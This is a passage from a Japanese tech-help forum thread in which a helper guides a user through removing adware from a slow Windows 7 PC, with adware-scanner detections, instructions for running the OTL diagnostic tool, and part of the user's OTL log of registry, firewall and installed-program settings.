キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{10A0E600-D246-BD63-F465-4C849C688998}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{10A0E600-D246-BD63-F465-4C849C688998}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}_is1
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}_is1
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
キー 検出済み項目 : HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10
キー 検出済み項目 : HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4
キー 検出済み項目 : HKLM\SOFTWARE\SearchProtect
キー 検出済み項目 : HKLM\SOFTWARE\SmdmF
キー 検出済み項目 : HKLM\SOFTWARE\systweak
キー 検出済み項目 : HKLM\SOFTWARE\Tune
キー 検出済み項目 : [x64] HKLM\SOFTWARE\Baidu
キー 検出済み項目 : [x64] HKLM\SOFTWARE\Classes\CLSID\{4AA46D49-459F-4358-B4D1-169048547C23}
キー 検出済み項目 : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
キー 検出済み項目 : [x64] HKLM\SOFTWARE\InstalledBrowserExtensions
キー 検出済み項目 : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492}
キー 検出済み項目 : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492}
キー 検出済み項目 : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Reimage Repair
キー 検出済み項目 : [x64] HKLM\SOFTWARE\Reimage
データ 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - c:\progra~2\searchprotect\searchprotect\bin\spvc32loader.dll
データ 検出済み項目 : [x64] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll

***** [ Webブラウザ ] *****

-\\ Internet Explorer v11.0.9600.17728

設定 検出済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Secondary Start Pages] - hxxp://jp.hao123.com/?tn=ime_inner_hp_26_hao123_jp&business_platform
設定 検出済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURls [Tabs] - hxxp://jp.hao123.com/?tn=incore_pa
  • T・T
  • 2015/04/30 (Thu) 07:35:30
次はOTLで解析します
おはようございます。

oldappsサイトでの警告ですね。
それは何とか自力で対処できたようなのでいいでしょう。
ログも見せてもらいましたが大漁ですね。
検出されたものもMBAMからそのまま処置したならいいです。

>だいぶ、広告類は減りました。まだ動作が重いのですがどうしたら良いですか?

では続きの解析作業しましょう。
現在この掲示板で主力となる解析ツールを使います。

以下のツールを準備してください。
OTL(OldTimer Listit)
ファイル直リンなので、DLしたら保存しておいてください。
http://oldtimer.geekstogo.com/OTL.exe
片付けるときは起動後に「Cleanup」ボタンを押せば自動で削除されます。

他のプログラムを起動しない状態でOTLを起動してください。
起動したら、ウィンドウの上の方にある「Scan All Users」にチェックを入れ、以下のコマンドを「Custom Scan/Fixes」にコピペしてください。

%windir%\tasks\*.job
DRIVES
BASESERVICES
%SYSTEMDRIVE%\*.exe
CREATERESTOREPOINT

その後、左上の「Run Scan」を押すとスキャン開始されます。
スキャン開始後、PC環境にもよりますが数分ほどすると、「OTL.txt」と「Extras.txt」がOTL.exeと同じ場所に作成されるはずなので、この2つのファイルをデスクトップあたりに保存しておいてください。
なお、Extras.txtは出ないこともありますが、その場合はOTL.txtだけでもいいです。

このあとOTLログを丸ごと返信に貼り付けてレスで見せてください。
ただしOTLログはかなり長くなるため、一度に送信してもfc2の文字数制限で途切れます。
なのでログも適当なところで分割して、複数回に分けてレス送信してください。

OTLでスキャンしただけでは何も変化は起きません。
この結果を見て、検出されたものを次回以降の作業で処置することになるはずです
  • 悪代官
  • 2015/04/30 (Thu) 08:12:05
Re: パソコン動作緩慢・広告類がひどい
遅くなってすみません
一応行ってみました。
OTL Extras logfile created on: 2015/04/30 21:04:26 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Owner\Downloads
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17728)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

3.92 Gb Total Physical Memory | 1.21 Gb Available Physical Memory | 30.84% Memory free
7.83 Gb Paging File | 4.72 Gb Available in Paging File | 60.23% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 623.75 Gb Total Space | 416.02 Gb Free Space | 66.70% Space Free | Partition Type: NTFS
Drive D: | 50.00 Gb Total Space | 49.24 Gb Free Space | 98.48% Space Free | Partition Type: NTFS
Drive E: | 88.93 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: UDF

Computer Name: OWNER-PC | User Name: Owner | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Extra Registry (SafeList) ==========[/color]


[color=#E56717]========== File Associations ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = BaiduSparkHTML] -- Reg Error: Key error. File not found
.url[@ = InternetShortcut] -- C:\windows\SysNative\rundll32.exe (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\windows\SysWow64\control.exe (Microsoft Corporation)
.html [@ = BaiduSparkHTML] -- Reg Error: Key error. File not found

[HKEY_USERS\S-1-5-21-3164139845-2903138398-2106333873-1000\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found

[color=#E56717]========== Shell Spawning ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- Reg Error: Key error.
https [open] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- Reg Error: Key error.
https [open] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.

[color=#E56717]========== Security Center Settings ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01 [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

[color=#E56717]========== Firewall Settings ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0

[color=#E56717]========== Authorized Applications List ==========[/color]


[color=#E56717]========== Vista Active Open Ports Exception List ==========[/color]
  • T・T
  • 2015/04/30 (Thu) 21:23:34
Re: パソコン動作緩慢・広告類がひどい

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{14E2DDC8-4A4C-435E-B5F6-D28CDC33309B}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{19378DAE-8404-4496-A5BB-BC01E83324D4}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{1D9310C2-AA81-4208-9235-C8BD917D2092}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{202E611E-9143-4096-AA43-0141D576BE23}" = rport=137 | protocol=17 | dir=out | app=system |
"{309921C4-E9D9-4C2E-8328-0C471ED2B954}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{35034D78-0948-4065-AA3B-9D3D118BDCA7}" = lport=6004 | protocol=17 | dir=in | app=c:\program files\microsoft office\office14\outlook.exe |
"{3D854D7D-D45C-4993-8914-AE08E260B8BD}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{4692A50C-0F67-437C-B6F5-B9451B5BADB0}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{4E9063FA-0CB0-4048-98B7-BFD902DA4182}" = rport=138 | protocol=17 | dir=out | app=system |
"{6102FCC2-9A9B-4DC8-A611-F0DBD856F7E8}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{62CF021B-85C1-4870-8673-D13C203A5EF1}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) |
"{65781193-EA33-4527-BA2B-7DB60DAE26A1}" = rport=139 | protocol=6 | dir=out | app=system |
"{7113FE39-4D36-4CC7-91EC-20174B2C66C4}" = lport=138 | protocol=17 | dir=in | app=system |
"{76D6C79C-9384-4F8A-906A-4A26D65F9B79}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{7B30585D-FD36-4B3F-9934-EFF0E371CCD8}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{7E8EA545-DEB7-41B6-964D-C37BC31F6A14}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{8247E2BA-69B4-418B-8B63-97EDFFA4FBEF}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |
"{84EB577C-0634-4CE7-9B5D-DDD6F112E2EE}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{879BAF45-1CAF-4E75-8377-7C7EFA04473F}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) |
"{912B8CFD-B85A-41CE-B777-0A88A9DCE665}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{94B94116-1C4C-4E0A-A8FC-61E289267C99}" = lport=445 | protocol=6 | dir=in | app=system |
"{9E9B3C8B-A6C6-4C9D-B2AD-2CB54C878C17}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{B114C433-962E-4846-9E84-15DB2B1E8FBB}" = lport=5353 | protocol=17 | dir=in | app=c:\program files (x86)\google\chrome\application\chrome.exe |
"{B6852D65-D145-479B-9013-984D831D45A2}" = lport=139 | protocol=6 | dir=in | app=system |
"{B896EBC9-70C6-47B5-A444-B4FE3377918F}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{BAE826C9-560F-481D-ACF6-071B56980AD6}" = lport=10243 | protocol=6 | dir=in | app=system |
"{D509A5C8-AEEF-40C2-A04F-2C418EC8B73C}" = rport=10243 | protocol=6 | dir=out | app=system |
"{D9EDB98C-7156-4E11-A0C9-0FFC2BB43A2C}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{DC858D8D-687D-47A7-A6CC-19ED228734E7}" = lport=2869 | protocol=6 | dir=in | app=system |
"{E173E3CC-B9AA-4381-9774-198873CD57D4}" = rport=445 | protocol=6 | dir=out | app=system |
"{E6001231-6B4C-4922-A6E0-BEC2740294A1}" = lport=137 | protocol=17 | dir=in | app=system |
"{E8B93851-7E45-46BA-A589-ADA840972509}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{F171C605-B8CF-45C0-B102-ABAD6F32CAD1}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{F2F7ADC6-B898-4F53-B948-05B34DC544BA}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{F4E32032-EF7C-41DD-8B85-E32F576C0C64}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |

[color=#E56717]========== Vista Active Application Exception List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{01E69D6C-F7C6-474D-8912-2B535DE2C522}" = protocol=6 | dir=out | app=system |
"{0A67D6CD-D235-4CDD-83F5-FA48633CCFE0}" = protocol=6 | dir=in | app=c:\program files (x86)\toshiba\regzalinkdubbing\tosrzdms.exe |
"{0C0A2EE8-1082-4FE7-BEC9-1928BFE93E9E}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{0DD56C29-8642-4681-BAA1-E0CBB76CB33B}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe |
"{1046B785-5169-49BA-9B2D-E1866322EA34}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{11636E68-ED54-46E8-A52A-7B880DEF2585}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{1DF9046B-86C3-4E1B-8728-D1C689D50D9E}" = dir=in | app=c:\program files (x86)\windows live\messenger\msnmsgr.exe |
"{26407C77-7FD3-4FF4-A07F-150C9819A23C}" = protocol=6 | dir=in | app=d:\steam\bin\steamwebhelper.exe |
"{2B292F08-335D-4615-9FDD-5B65102D1729}" = protocol=17 | dir=in | app=c:\programdata\nexonjp\506\nmservice.exe |
"{3AA8E9DF-8ED7-4D7E-A4AD-B3A21E2E1B4E}" = dir=in | app=c:\program files (x86)\cyberlink\rz player\softdma.exe |
"{410A75C9-CB61-4E81-8525-44FC1F81FF8D}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |
"{41228EAC-A608-4428-808B-5FE2EDDCD618}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{44698D10-A77D-49B4-89DB-7CB144876E44}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{49679EF5-20B8-4788-84C3-F030D26A47AB}" = protocol=6 | dir=in | app=c:\programdata\nexonjp\506\nmservice.exe |
"{598F7BF6-241A-4F96-B57E-8D4C2FEDA75E}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |
"{5B720C7D-38E5-420D-A5E2-726123E83FE0}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{737455EF-273B-4B78-9D9A-29C86C7CDD83}" = dir=in | app=c:\program files (x86)\intel corporation\intel widi\widiapp.exe |
"{7469006F-A7ED-4BBE-926F-CC3410D1E6B5}" = protocol=17 | dir=in | app=c:\program files\microsoft office\office14\onenote.exe |
"{8278D6D2-0C2F-4ED7-9D16-A2005EF3A692}" = dir=in | app=c:\program files\intel\wifi\bin\pandhcpdns.exe |
"{834B1EA1-0C3A-4386-8C6B-C466E5D72192}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{84F6D3E5-6692-4BBD-AE0C-89F4EEDE059B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{94880B4E-22D7-4692-8350-76A9A26C3C78}" = dir=in | app=c:\program files (x86)\toshiba\regzalinkdubbing\tosrzdms.exe |
"{9ACF0896-8C01-4683-8529-0C2DA737170A}" = dir=in | app=c:\program files (x86)\toshiba\regzalinkdubbing\tosrzuav.exe |
"{A57A9736-822F-4C6A-BF67-6B81BC6F2F5D}" = protocol=17 | dir=in | app=c:\program files (x86)\toshiba\regzalinkdubbing\tosrzuav.exe |
"{AA190980-31C0-4676-9801-B4948C2F08BA}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{AB95BB35-7176-4E50-BFA5-BAF6EBB9C5BE}" = protocol=6 | dir=in | app=d:\steam\steam.exe |
"{ABC73C57-31C0-4D7E-A829-2B0328C82277}" = protocol=17 | dir=in | app=d:\steam\bin\steamwebhelper.exe |
"{ADF9508B-19AB-44E1-B6D3-2C0E87D2D5E7}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |
"{BB30583B-281E-4B06-B9AD-EC8570DFB74D}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\terraria\terraria.exe |
"{BD5A6308-D6A9-444C-A4E9-631E83407F4F}" = protocol=17 | dir=in | app=c:\programdata\nexonjp\ngm\ngm.exe |
"{BD8EC21E-3DBD-45BA-BDFC-5C1847D47648}" = protocol=17 | dir=in | app=d:\steam\steam.exe |
"{BFF80137-1D1E-482A-933C-882DCB22E079}" = protocol=17 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{C076470D-2A9C-492A-ACB9-5389CFE60942}" = protocol=6 | dir=in | app=c:\programdata\nexonjp\ngm\ngm.exe |
"{C4A266AC-92D9-40C5-B1BC-4F092E841532}" = protocol=6 | dir=in | app=c:\program files\microsoft office\office14\onenote.exe |
"{CC8625B8-8470-443A-9877-0F43258FB09C}" = protocol=6 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{D6B4FB8E-3E7C-4CE8-80D0-F0CA37D427A4}" = protocol=6 | dir=in | app=c:\program files (x86)\toshiba\regzalinkdubbing\tosrzuav.exe |
"{E6ABA465-1F52-4DD1-9208-055066F9DB44}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\terraria\terraria.exe |
"{E8F63694-564A-4D15-A628-201A39DA48EE}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{EFEB117A-A8CB-4DBB-933C-4AB0DE31B23F}" = protocol=17 | dir=in | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{F13BFD82-633B-4A83-A83D-C81E20908620}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{F184BAA8-1E0F-4E3C-BFC9-7232255AE2CD}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |
"{F224057F-7B2A-4575-A46A-7D3E5FE95B59}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{FB81822C-189C-4EA1-9838-67AFBF61FBE5}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"TCP Query User{42B0A2AF-B94F-4624-9E6C-42117C8CD204}C:\program files (x86)\epson software\event manager\eeventmanager.exe" = protocol=6 | dir=in | app=c:\program files (x86)\epson software\event manager\eeventmanager.exe |
"TCP Query User{4359B5F6-59BD-442A-BC88-9F45EBA6E37A}D:\steam\steamapps\common\terraria\terrariaserver.exe" = protocol=6 | dir=in | app=d:\steam\steamapps\common\terraria\terrariaserver.exe |
"TCP Query User{7167DEF0-C823-48C4-984E-76D4810C4563}C:\program files (x86)\epson software\event manager\eeventmanager.exe" = protocol=6 | dir=in | app=c:\program files (x86)\epson software\event manager\eeventmanager.exe |
"UDP Query User{39984352-8933-49AC-A210-7A5439FE4946}C:\program files (x86)\epson software\event manager\eeventmanager.exe" = protocol=17 | dir=in | app=c:\program files (x86)\epson software\event manager\eeventmanager.exe |
"UDP Query User{66764A54-CA12-4360-B694-86975F2641A3}C:\program files (x86)\epson software\event manager\eeventmanager.exe" = protocol=17 | dir=in | app=c:\program files (x86)\epson software\event manager\eeventmanager.exe |
"UDP Query User{FC0E7639-928A-417C-938B-0F8CA05ADFC2}D:\steam\steamapps\common\terraria\terrariaserver.exe" = protocol=17 | dir=in | app=d:\steam\steamapps\common\terraria\terrariaserver.exe |

[color=#E56717]========== HKEY_LOCAL_MACHINE Uninstall List ==========[/color]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{066CFFF8-12BF-4390-A673-75F95EFF188E}" = TOSHIBA Value Added Package
"{1AAF6669-31B2-3840-9346-F0F653840FD1}" = Microsoft .NET Framework 4.5.1 (JPN)
"{1B8ABA62-74F0-47ED-B18C-A43128E591B8}" = Windows Live ID Sign-in Assistant
"{1C8C049A-145F-4A6E-8290-B5C245EBE39D}" = TOSHIBA Bulletin Board
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219
"{24811C12-F4A9-4D0F-8494-A7B8FE46123C}" = TOSHIBA ReelTime
"{26601FD6-CCFC-4F06-88C5-D110B1D4756F}" = TOSHIBA ecoユーティリティ
"{26784146-6E05-3FF9-9335-786C7C0FB5BE}" = Microsoft .NET Framework 4.5.2
"{2773CED3-7865-4CA9-8C2A-1B5AF9B3E5BD}" = TOSHIBA Manual
"{27C3DB42-A9C1-4B44-A164-93849D160D12}" = TOSHIBA VIDEO PLAYER
"{28EF7372-9087-4AC3-9B9F-D9751FCDF830}" = Intel(R) Wireless Display
"{3C41721F-AF0F-4086-AA1C-4C7F29076228}" = インテル(R) PROSet/Wireless WiFi ソフトウェア
"{5DA0E02F-970B-424B-BF41-513A5018E4C0}" = TOSHIBA Disc Creator
"{5EB6F3CB-46F4-451F-A028-7F6D8D35D7D0}" = Windows Live Language Selector
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8B276B33-A289-487D-8177-1C652D809FCB}" = BookPlaceReader
"{90140000-0016-0411-1000-0000000FF1CE}" = Microsoft Office Excel MUI (Japanese) 2010
"{90140000-0018-0411-1000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (Japanese) 2010
"{90140000-001A-0411-1000-0000000FF1CE}" = Microsoft Office Outlook MUI (Japanese) 2010
"{90140000-001B-0411-1000-0000000FF1CE}" = Microsoft Office Word MUI (Japanese) 2010
"{90140000-001F-0409-1000-0000000FF1CE}" = Microsoft Office Proof (English) 2010
"{90140000-001F-0411-1000-0000000FF1CE}" = Microsoft Office Proof (Japanese) 2010
"{90140000-0028-0411-0000-0000000FF1CE}" = Microsoft Office IME (Japanese) 2010
"{90140000-0028-0411-1000-0000000FF1CE}" = Microsoft Office IME (Japanese) 2010
"{90140000-002C-0411-1000-0000000FF1CE}" = Microsoft Office Proofing (Japanese) 2010
"{90140000-0043-0000-1000-0000000FF1CE}" = Microsoft Office Office 32-bit Components 2010
"{90140000-0043-0411-1000-0000000FF1CE}" = Microsoft Office Shared 32-bit MUI (Japanese) 2010
"{90140000-006E-0411-1000-0000000FF1CE}" = Microsoft Office Shared MUI (Japanese) 2010
"{90140000-00A1-0411-1000-0000000FF1CE}" = Microsoft Office OneNote MUI (Japanese) 2010
"{91140000-0013-0000-1000-0000000FF1CE}" = Microsoft Office Essentials 2010
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.2
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1041" = Microsoft .NET Framework 4.5.1 (日本語)
"{9495AEB4-AB97-39DE-8C42-806EEF75ECA7}" = Microsoft Visual Studio 2010 Tools for Office Runtime (x64)
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{95140000-0119-0411-1000-0000000FF1CE}" = Microsoft Office ナビ 2010
"{9AF57B0E-BC46-4DD4-AD6E-9082F2B45634}" = 東芝プレイス ダイジェストワード
"{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}" = TOSHIBA PC Health Monitor
"{ABBD4BA8-6703-40D2-AB1E-5BB1F7DB49A4}" = セキュリティ対策ツール
"{ABBD4BA9-6703-40D2-AB1E-5BB1F7DB49A4}" = Trend Micro Titanium
"{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}" = PlayReady PC Runtime amd64
"{C4FFA951-9678-4D51-84B4-AFD15D3C45AD}" = TOSHIBA Hardware Setup
"{CBD6B23D-41D5-4A46-8019-6208516C9712}" = TOSHIBA Supervisor Password
"{D2837730-4960-3B35-8088-201387FD3BDB}" = Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - JPN
"{D291BE1E-17F3-4593-9F99-811EFF05F25E}" = TOSHIBA Speech Synthesis
"{D4322448-B6AF-4316-B859-D8A0E84DCB38}" = 東芝HDD/SSDアラータ
"{DA54F80E-261C-41A2-A855-549A144F2F59}" = Windows Live MIME IFilter
